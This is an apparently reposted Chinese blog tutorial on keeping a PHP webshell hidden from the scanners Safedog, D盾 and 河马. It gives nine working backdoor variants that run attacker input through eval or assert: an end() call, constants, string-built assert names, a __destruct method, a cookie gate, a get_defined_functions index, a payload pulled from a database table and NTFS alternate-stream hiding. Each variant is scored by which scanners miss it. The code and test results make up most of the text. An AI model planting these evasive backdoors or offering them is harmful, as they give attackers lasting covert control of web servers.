热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

渗透测试基础bypass绕过阻挡我们的WAF(下)

渗透测试基础-bypass

渗透测试基础 - bypass-绕过阻挡我们的WAF(下)

    • 简介
    • 前期测试原理
    • 方法一 (end函数)
    • 方法二 (定义常量)
    • 方法三 (字符串拼接 + 双美元符)
    • 方法四 (强行分割)
    • 方法五 (魔术方法执行)
    • 方法六 (COOKIE传参加入条件)
    • 方法七 (get_defined_functions)
    • 方法八 (远程获取)
    • 方法九 (CMD藏文件之NTFS文件流)
    • 漏洞总结

只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力?!

请进行合法的渗透测试,有关内容只是用作个人复习。

简介

上次介绍了如何绕过安全狗的测试语句检测,这次将介绍,在得到webshell权限后,如何让自己的木马文件不会被发现并删除。以webshell查杀来说,安全狗确实差了点意思,稍微对语句做一点变动,安全狗就不能有效的识别,所以这里会在多加入两个webshell检测工具,进行同步测试。【在正常的渗透测试中,是不需要做到让咱们的木马达到不被发现并删除的情况,所以我们这里还是以学习为主,当安全工具检测到恶意文件并无法确定是不是木马文件时,这就需要我们来进行评判了

三个webshell查杀工具下载地址:
【安全狗】:http://free.safedog.cn/website_safedog.html
【D盾】:http://www.d99net.net/News.asp?id=62
【河马】:https://www.shellpub.com

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

前期测试原理

在这里插入图片描述
在网站目录下留下一个较为常见的一句话木马文件,然后和网站安全狗配合测试。
在这里插入图片描述
安全狗一下就找到了它的存在,那这样是不行的,总不能刚刚放了一个文件进去就被发现了吧,那可太拉跨了,所以我们得对其进行一下测试,看看安全狗到底是因为什么而发现的它。

在这里插入图片描述
在这里插入图片描述
在删除了$_REQUEST后面的中括号之后,发现安全狗好像没有认为其是木马文件了,所以这里是对中括号进行了拦截嘛?在测试一下前面的eval试试。
在这里插入图片描述
在这里插入图片描述

发现这样也是不拦截的,所以我们能不能采用替换的方法先试试呢?
eval是可以被assert所代替的,这个下面有例子能讲解。
那中括号呢有没有办法让其既不出现,但是这个文件又能达到木马的作用呢?

方法一 (end函数)

eval(end($_REQUEST));?>

在这里插入图片描述
根据了解知道 函数end()就是输出数组中最后一个值的,那这里的$_REQUEST刚刚好接收到的数据就是数组的形式。
在这里插入图片描述

eval(end($_REQUEST));?>

所以这里end来获取$_REQUEST的值,然后再次给eval执行,既不用写刚刚的中括号,又让其能执行,这里来测试一下。
在这里插入图片描述
这里测试使用是没有问题的 拿到安全狗检测一下。
在这里插入图片描述
安全狗说自己没有发现,那这样就逃过了安全狗的检测。能过安全狗还不行,咱们再试试D盾和河马。
在这里插入图片描述
在这里插入图片描述

能看到河马也没有查出来,只有D盾能检测到。

方法二 (定义常量)

define("a","$_REQUEST[a]");eval(a);?>

在这里插入图片描述
定义常量 define常量的名字常量的值),a的值,就是$_REQUEST[a]接收到的值,然后在后面eval执行。

在这里插入图片描述
执行没问题,三个软件检查一下。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
安全狗(
河马(
D盾(检查到威胁4级【1-5级,5级紧急】

方法三 (字符串拼接 + 双美元符)


$a = 'ass';
$b = 'ert';
$funcName = $a.$b;
$x = 'funcName';
$$x($_REQUEST[a]);
?>

这里就将eval替换为了assert,因为eval禁止拼接执行,所以这里只有assert才能这么玩

assert拆开了,分别赋值给 $a 和 $b ,然后下面将其拼接回来,并将assert字符串值赋值给了$funcName,然后$x = 字符串的funcName,下面是双美元符号,因为$x == funName$funcName == assert 所以最后的结果就是assert($_REQUEST[a])
在这里插入图片描述

正常使用,还是用webshell工具查杀一下
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
安全狗()【安全狗这小子,成绩一直很稳定】
河马(检测到威胁
D盾(检查到威胁3级相比于刚才降低了一级

方法四 (强行分割)


function a($a){
return $a;
}
eval(a($_REQUEST)[a]);
?>

这里自定义一个叫a的函数,括号里面放入$a,下面是return 返回$a的值,这里就是,往$a里面传什么进去,就会返回什么回来。eval执行(函数a想要将$_REQUEST传入进去,然后返回回来一个$_REQUEST,然后就形成了eval($_REQUEST['a']))

在这里插入图片描述
正常使用,webshell工具检测一下
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
安全狗(
河马(
D盾(检查到威胁5级)【D盾这小子打小就聪明】

方法五 (魔术方法执行)


class User{
public $name = '';
function __destruct(){
eval("$this->name");
}
}
$user = new User;
$user->name = ''.$_REQUEST['a'];
?>

  1. 定义一个叫User的类
  2. 声明一个name公有变量 但是没有给其赋值
  3. 定义一个魔术方法,__destruct()的意思是当对象被销毁时执行【一定会执行的,因为一定会销毁】
    在这里插入图片描述
  4. 销毁时执行eval("$this->name");这里也是还没有跟name赋值
  5. User类实体化
  6. 将得到的值放入name中,然后放到上面的eval执行。
    在这里插入图片描述
    正常使用,webshell工具查杀一下

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
安全狗(
河马(
D盾(检查到威胁5级)【该买谁 现在知道了吧】

方法六 (COOKIE传参加入条件)


$COOKIE = $_COOKIE;
foreach( $COOKIE as $key => $value)
{
if($key=='assert'){
$key($_REQUEST['a']);
}
}
?>

先获取COOKIE值,将COOKIE的值放入$COOKIE中,因为COOKIE获取到的值是数组形式,所以这里用foreach进行结果遍历,将结果和值,分别放入$key$value 中【键值分离】。然后if条件判断,当COOKIE中键等于assert时,拿着$key去执行$_REQUEST传入过来值。

在这里插入图片描述

COOKIE不传入assert 是不能正常执行的
继续测试查杀软件的成绩
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

安全狗(
河马(检测到威胁
D盾(检查到威胁2级

方法七 (get_defined_functions)


$a = get_defined_functions();
$a[internal][841]($_REQUEST['a']);
?>

这里开局就遇到一个不认识的东西,我们看看是啥
在这里插入图片描述
在这里插入图片描述
那前面的数字是什么意思呢,输出一下看看。
在这里插入图片描述
那这样就好理解了,get_defined_functions()将得到的数据全部放入$a中,然后用$a[internal][841]去检索里面的值,将assert给取出来,和后面的($_REQUEST['a'])相结合使用。【不得不说,想出这个的老哥还是秀的呀】
在这里插入图片描述
查杀软件的成绩
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
安全狗()【专业陪跑】
河马(
D盾(检查到威胁2级)【全靠友商衬托 哈哈】

方法八 (远程获取)


'''
eval(mysqli_fetch_assoc(mysqli_query(mysqli_connect('
127.0.0.1','root','root','mysql_database','post'),'select * from jinx'))['info'])
'
''
?>

这里有三个函数,一个个了解一下
mysqli_fetch_assoc:就是从结果里面取一行数据
在这里插入图片描述

mysqli_query:这个一下连下面那个的意思也解释了,第一个做链接,第二个是查询
在这里插入图片描述

mysqli_connect:链接数据库

那这样就好解释了
执行(取一行数据(查点数据(链接数据库,取出表jinx里面的所有数据))【查询的条件:info字段】)
在这里插入图片描述
在配上这样一个图,就大功告成。
也测试一下。
在这里插入图片描述
webshell查杀一下。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
安全狗(检测出威胁)【ohhhhhhhhhh】
河马()【小丑竟是我自己】
D盾(检查到威胁5级)【基操勿6】

方法九 (CMD藏文件之NTFS文件流)

【网站目录下存放文件】
【网站目录下打开CMD】 echo "" >> /:123.txt

在这里插入图片描述
在这里插入图片描述
执行完了之后好像什么都没有发生,但其实已经完成了。
在这里插入图片描述
最后再来看看测试结果。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
安全狗(
河马(
D盾(

在这里插入图片描述

漏洞总结

本次介绍的这些方法都还算比较实用的,如果在现实中有遇到安全软件吃不准的情况下,个人就可以做一下判断,来确定是不是木马文件。

《最好的防御,是明白其怎么实施的攻击》


推荐阅读
  • 本文探讨了 Spring Boot 应用程序在不同配置下支持的最大并发连接数,重点分析了内置服务器(如 Tomcat、Jetty 和 Undertow)的默认设置及其对性能的影响。 ... [详细]
  • 深入解析 Apache Shiro 安全框架架构
    本文详细介绍了 Apache Shiro,一个强大且灵活的开源安全框架。Shiro 专注于简化身份验证、授权、会话管理和加密等复杂的安全操作,使开发者能够更轻松地保护应用程序。其核心目标是提供易于使用和理解的API,同时确保高度的安全性和灵活性。 ... [详细]
  • 如何彻底清除顽固软件如360
    本文详细介绍了如何彻底卸载难以删除的软件,如360安全卫士。这类软件不仅难以卸载,还会在开机时启动多个应用,影响系统性能。我们将提供两种有效的方法来帮助您彻底清理这些顽固软件。 ... [详细]
  • 本文介绍如何在现有网络中部署基于Linux系统的透明防火墙(网桥模式),以实现灵活的时间段控制、流量限制等功能。通过详细的步骤和配置说明,确保内部网络的安全性和稳定性。 ... [详细]
  • 作者:守望者1028链接:https:www.nowcoder.comdiscuss55353来源:牛客网面试高频题:校招过程中参考过牛客诸位大佬的面经,但是具体哪一块是参考谁的我 ... [详细]
  • 本文深入探讨了计算机网络的基础概念和关键协议,帮助初学者掌握网络编程的必备知识。从网络结构到分层模型,再到传输层协议和IP地址分类,文章全面覆盖了网络编程的核心内容。 ... [详细]
  • Startup 类配置服务和应用的请求管道。Startup类ASP.NETCore应用使用 Startup 类,按照约定命名为 Startup。 Startup 类:可选择性地包括 ... [详细]
  • 本文介绍了多个关于JavaScript的书籍资源、实用工具和编程实例,涵盖从入门到进阶的各个阶段,帮助读者全面提升JavaScript编程能力。 ... [详细]
  • 基于KVM的SRIOV直通配置及性能测试
    SRIOV介绍、VF直通配置,以及包转发率性能测试小慢哥的原创文章,欢迎转载目录?1.SRIOV介绍?2.环境说明?3.开启SRIOV?4.生成VF?5.VF ... [详细]
  • dotnet 通过 Elmish.WPF 使用 F# 编写 WPF 应用
    本文来安利大家一个有趣而且强大的库,通过F#和C#混合编程编写WPF应用,可以在WPF中使用到F#强大的数据处理能力在GitHub上完全开源Elmis ... [详细]
  • 微软Exchange服务器遭遇2022年版“千年虫”漏洞
    微软Exchange服务器在新年伊始遭遇了一个类似于‘千年虫’的日期处理漏洞,导致邮件传输受阻。该问题主要影响配置了FIP-FS恶意软件引擎的Exchange 2016和2019版本。 ... [详细]
  • 本文详细介绍了如何准备和安装 Eclipse 开发环境及其相关插件,包括 JDK、Tomcat、Struts 等组件的安装步骤及配置方法。 ... [详细]
  • 本文探讨了在Windows Server 2008环境下配置Tomcat使用80端口时遇到的问题,包括端口被占用、多项目访问失败等,并提供详细的解决方法和配置建议。 ... [详细]
  • 深入解析TCP/IP五层协议
    本文详细介绍了TCP/IP五层协议模型,包括物理层、数据链路层、网络层、传输层和应用层。每层的功能及其相互关系将被逐一解释,帮助读者理解互联网通信的原理。此外,还特别讨论了UDP和TCP协议的特点以及三次握手、四次挥手的过程。 ... [详细]
  • 本主题面向IT专业人士,介绍了Windows Server 2012 R2和Windows Server 2012中的组托管服务账户(gMSA),涵盖了其应用场景、功能改进、硬件和软件要求以及相关资源。 ... [详细]
author-avatar
禅茶一味2502922807_527
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有